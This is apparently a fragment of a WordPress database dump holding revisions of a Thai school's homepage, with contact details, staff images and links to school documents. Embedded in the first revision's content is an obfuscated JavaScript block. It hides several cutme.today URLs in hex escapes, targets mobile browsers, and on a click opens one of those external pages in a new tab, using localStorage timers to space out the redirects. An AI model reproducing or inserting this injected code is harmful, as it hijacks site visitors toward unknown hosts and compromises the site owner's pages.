{\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:34:23','2025-07-15 07:34:23','',19,'http://watprato.ssk.in.th/?p=685',0,'revision','',0),
(686,1,'2025-07-15 14:40:09','2025-07-15 07:40:09','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline 